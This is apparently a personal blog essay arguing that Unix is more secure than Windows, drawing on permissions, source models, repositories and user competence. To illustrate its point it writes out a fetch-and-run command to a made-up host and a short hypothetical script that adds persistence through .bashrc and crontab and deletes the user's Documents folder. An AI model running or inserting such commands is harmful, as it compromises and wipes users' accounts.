Rambling: Unix, Windows, and Security

I've become more and more interested in computer security the more I've read about it. The principles and practices are fascinating, and the theories about why some observable phenomena occur are at least thought-provoking.

Here's my short tract on why Unix is more secure than Windows.

To start off, 99% of the lowest 50% on the technical literacy scale use Windows. It's not their fault; they just don't know any better. You need to know enough about computers to believe a Mac has advantages over Windows before you'll want one, and you need at least moderate computer skill to get anything else onto your machine. This means that almost all of the least competent users are using Windows.

Technical competence of the user is the SINGLE BIGGEST FACTOR in the security of any particular system. Consider: if you give an idiot an OpenBSD system (possibly the most secure in the world), set it up for him, and lock him out of configuring anything outside his home directory, there's still no guarantee he won't come back to you saying "I was trying to get YouTube working and now my files are gone / the computer runs slow / I keep getting popups / whenever I copy a file it gets deleted," and so on. Even if the user is restricted to their little home folder, all anyone needs to take control of that system is to get the person to run a command like "wget -O - http://skript.kidiz.net/pwnbox.sh | bash -", and then there's no telling what corruption can happen within that profile. The last time I regularly used Windows XP, the only good protection I had was my router (being behind a NAT increases security), and I had no issues at all. (For perfect honesty, I also had Spybot, but I rarely ran scans, they never found anything, and I never got alerts about registry changes unless I had actually changed something.)
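To make that concrete, here is a minimal sketch of why user-level access is all an attacker needs. The script contents are invented for illustration ("stage2.sh" and ".worker" are made-up names); the point is that none of it requires root:

    # Hypothetical contents of pwnbox.sh. Every line here runs as the
    # unprivileged user, entirely within his own home directory.
    echo 'wget -O - http://skript.kidiz.net/stage2.sh | bash' >> ~/.bashrc   # re-infect on every new shell
    (crontab -l 2>/dev/null; echo '*/10 * * * * $HOME/.cache/.worker') | crontab -   # keep a bot process alive
    rm -rf ~/Documents   # or simply destroy the user's own files

The startup scripts and system files survive untouched, but from the user's point of view the machine is just as ruined.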

Now, computers are dumb. Like cars. They have no idea what you're thinking; they just do what they're told. So who tells your computer what to do other than you? Well, the people who wrote your operating system.

Windows was originally conceived as a single-user operating system, simply a platform to run applications from floppies and later CDs. In such a world, Windows would have been a fairly good operating system, with few and likely easily fixable security issues, which would have required physical access to the machine to exploit anyway.

Unix was designed as a multi-user operating system. It shows in various ways, one of the most obvious being the filesystem permission system (Unix has separate read/write/execute permission sets for the user that owns a file, the group that owns it, and everyone else). This design served it well when networking started to become more and more important. It certainly helped that the original TCP/IP stack was written for BSD (a Unix distribution). It was possible to have network services (such as ftp, telnet, and http servers) run distinct from one another. On a typical modern Unix system there are various default accounts that the user will never log in with, such as "ftp", "nobody", "daemon", "sys", and many others. There's also the administration-only user, "root". Unix leverages this multi-user permission system to increase its security. Even if the ftp server had a vulnerability that allowed an intruder to run code, that code would run only as the "ftp" user, and thus could not change the startup scripts or delete important files (except the files the "ftp" user owned, which in practice meant only the things the ftp server needed to read and write in order to run).
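To illustrate (the exact paths, IDs, and dates here are made up, but the shape is what you'd see on any Unix):

    # Owner "ftp" may read and write; the group and everyone else may only read:
    $ ls -l /var/ftp/pub/README
    -rw-r--r--  1 ftp  ftp  1024 Jan  5  2009 /var/ftp/pub/README

    # Service accounts are ordinary /etc/passwd entries, usually with a
    # shell that forbids interactive logins:
    $ grep '^ftp:' /etc/passwd
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

    # Code running as "ftp" simply cannot touch root's files:
    $ rm /etc/rc.conf
    rm: cannot remove '/etc/rc.conf': Permission denied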

The idea of a single-user system, though, is that a program can do whatever it wants, seeing as "only the user would be telling the computer what to do". The computing landscape has changed drastically since then, especially with the rise of the Internet. Once you network such a system, a single security flaw can let anyone on the network tell that computer what to do, unhindered; after all, "only the user would be telling the computer what to do". The assumption fails in a networked context. Things were better in the NT>2000>XP>Vista line than in the 95>98>ME line, but many problems persisted because Microsoft wanted to maintain backward compatibility.

This leads to the next problem, which is open vs. closed source. In this particular context, backward compatibility is necessary because Windows programs are very often distributed ONLY as binaries, the most specific and inflexible instructions a computer can be given (binaries are extremely difficult to modify without breaking a program, but they are the only thing a computer really understands). You can't change even one little thing in the system without care, or you may break an application that depends on it. In the open source world, this isn't a huge issue. Open source means you can see the higher-level instructions the computer is being given, and change them easily if some change in the system requires it. Open source software is more flexible in this regard. It is not just written, compiled, and released, with the creators then free to sit back and make money off it. Open source software is invariably an ongoing project, and the maintainers make sure the program works on as many platforms as possible. They have automated the process of building the flexible source code into an executable binary suited to the environment it is built in: a different binary will be produced if a different function library is present, or a different compiler is available, or the application must run on a different kernel. The build process detects what is available, determines what needs to be built, and builds it so that it works.
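In practice that automation is the familiar three-step build from source; something like the following, with the package name invented for the example:

    # Unpack the source code
    $ tar xzf someapp-1.2.tar.gz && cd someapp-1.2
    # Probe the environment (compiler, libraries, kernel) and generate
    # a Makefile that matches what was found:
    $ ./configure --prefix=/usr/local
    # Compile a binary tailored to this machine, then install it:
    $ make
    $ sudo make install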

Windows must maintain binary compatibility, the most rigid and inflexible kind, requiring that what might now be recognized as bad decisions still be honored, lest programs fail to run properly. Unix, in the vast majority of cases, needs to maintain only source compatibility. And even that is fairly loose, as programmers who prefer different platforms will often "port" a program: change its source code so that it runs on the system they want it to. The whole system is quite free to grow and develop and change. Something that looked like a good idea 10 years ago may be a stupid idea and a security hole now. Unix systems can fix these problems more easily.

What this means is that old Windows bugs die hard, while new Unix bugs are usually fixed within days of their discovery, often with only around an hour of programmer time spent on them.

This leads me right into my next point: repositories. Most free Unices (plural of Unix) have a repository, or a few repositories, of software packages. This is necessary because each system works slightly differently, and a program needs slight modifications to run on each one. FreeBSD has a system called "ports". Gentoo has a similar system inspired by FreeBSD's, called "portage". Ubuntu manages software through APT, with Synaptic as its graphical front-end. OpenSolaris has pkg. OpenBSD has pkg_add. The iPhone (yes, it runs a variant of Unix) has the App Store, or Cydia if you jailbreak it.

These repositories are trustworthy sources of applications. The programs available in them are (with a few exceptions) free and open source. To install software, a user often needs to do nothing more than open the package management software, check a box, and click apply. The package manager checks the versions of everything; if there is an incompatibility, the user is notified, and often told what must be done to fix it. If there aren't any problems, the package manager, depending on how it works, will either download a binary and install it, or download the source code, apply any "patches" needed to make it compile into a binary that fits the system, and then install the binary that results.
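On the command line the differences between these systems are superficial; a few real-world equivalents, using a media player as the example package (assuming it's present in each repository):

    # Ubuntu/Debian: fetch and install a prebuilt binary package via APT
    $ sudo apt-get install vlc
    # FreeBSD ports: fetch the source, apply the tree's patches, build, install
    $ cd /usr/ports/multimedia/vlc && sudo make install clean
    # Gentoo portage: likewise builds from patched source
    $ sudo emerge media-video/vlc
    # OpenBSD: install a prebuilt package
    $ sudo pkg_add vlc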

Software management in Windows is comparatively atrocious, dirty, and insecure. It requires first deciding what you want a program to do, then looking for a program that merely promises to do it in a place where claims need not be verified and cannot be second-guessed: Internet advertising. The Windows user then downloads an executable and runs it. The novice Unix user is not used to running applications from untrusted sources as a normal part of using their computer. The novice Windows user is. The novice Windows user is also rarely if ever warned not to run their normal account as an administrator. Only recently did Microsoft address this, by having even administrator accounts run as regular users that are elevated to Administrator only when necessary (User Account Control, introduced in Vista). It is the literal truth that Windows users execute arbitrary code as root and don't think twice. The repository model is far more secure than Windows' model.

To put things in equivalent terms, the open source method is like requiring a different version of a program depending on whether you have Windows XP or Windows Vista. The way closed-source software is distributed makes that extremely impractical. On the other hand, for Unix, maintaining backward compatibility is impractical for the purposes many of these systems serve. Unix is an extremely flexible family of operating systems, running on everything from toasters to cellphones to Roadrunner (currently the world's fastest supercomputer) and everything in between. For the toaster version of Unix (I'm thinking of NetBSD) to carry all the same things as the Linux running on Roadrunner would simply be stupid; putting enough hardware in a toaster to run the same networking stack as Roadrunner is obviously impractical. Windows, by contrast, rarely has to run on anything less powerful than a netbook these days. And for what are called "embedded" applications, like cellphones, even Microsoft has to make changes big enough to break backward compatibility. You can't run Windows Mobile applications on an Xbox, nor Xbox games on PCs (at least not without "porting" them).

There's no technological reason why Unix couldn't maintain perfect backward compatibility as it kept growing forward. In fact, Sun's Solaris operating system tries to do just that. It's worth noting that a few years ago, Sun released an open-source version of Solaris, called OpenSolaris. While Sun will continue to maintain Solaris and its backward compatibility with earlier Solaris applications, OpenSolaris has no such requirement in its releases. Likewise, there's no technological reason why Windows couldn't maintain repositories. What determines this isn't what is technologically possible. The source model tends to direct a project in one direction or the other: either toward repositories of ports or toward one-size-fits-all.

I'm just saying that it is neither a coincidence nor a direct causal law that open source projects come up with more secure ways to do things than closed-source ones.

So you can imagine it frustrates me when people say that the main reason Unix doesn't have all these viruses and worms and spyware and adware is that it's too small to pay attention to. Unix is more secure because of the way it is developed. It's more secure because of the way it was originally designed. There is the idea, and then there is the implementation. It is fallacious to say that the only way Unix could be more secure than Windows is as an effect of popularity, because that implies security exists only in implementation. This is not the case.

A rarely used retort, which should be obvious, is that a single server can be worth well more than a thousand desktops and laptops. What do you think a cracker would rather control: your underpowered Vista-burdened desktop with a DSL connection, or a server in a data center with a gigabit Internet connection, probably hosting a MySQL database with possibly sensitive information? It's obvious that the people saying these things think the only computers that exist are desktops and laptops full of pictures of people's kids and their favorite music and their favorite games. That's all they've ever seen, so they assume that's all the crackers have ever seen. And as Windows is all they know, they cannot imagine a system so different from Windows as to be more secure in anything but implementation. Crackers are not after sheer numbers of machines; while numbers are good, they also weigh the value of each specific machine. In short, why would they target your limited Vista desktop rather than some of Bank of America's Solaris machines? If Unix is more secure only in implementation, as implied, why do they so overwhelmingly go after the small fish when the big prize lies in the supposedly equally insecure Unix systems?

The user is what makes or breaks the security of a system.

(The word "cracker" was used in this work to mean the same thing as the colloquial meaning of "hacker". However, "hacker" has multiple meanings and not always negative, for instance, a "white hat" hacker is not belligerent or malignant. "Cracker" on the other hand is never used positively.)
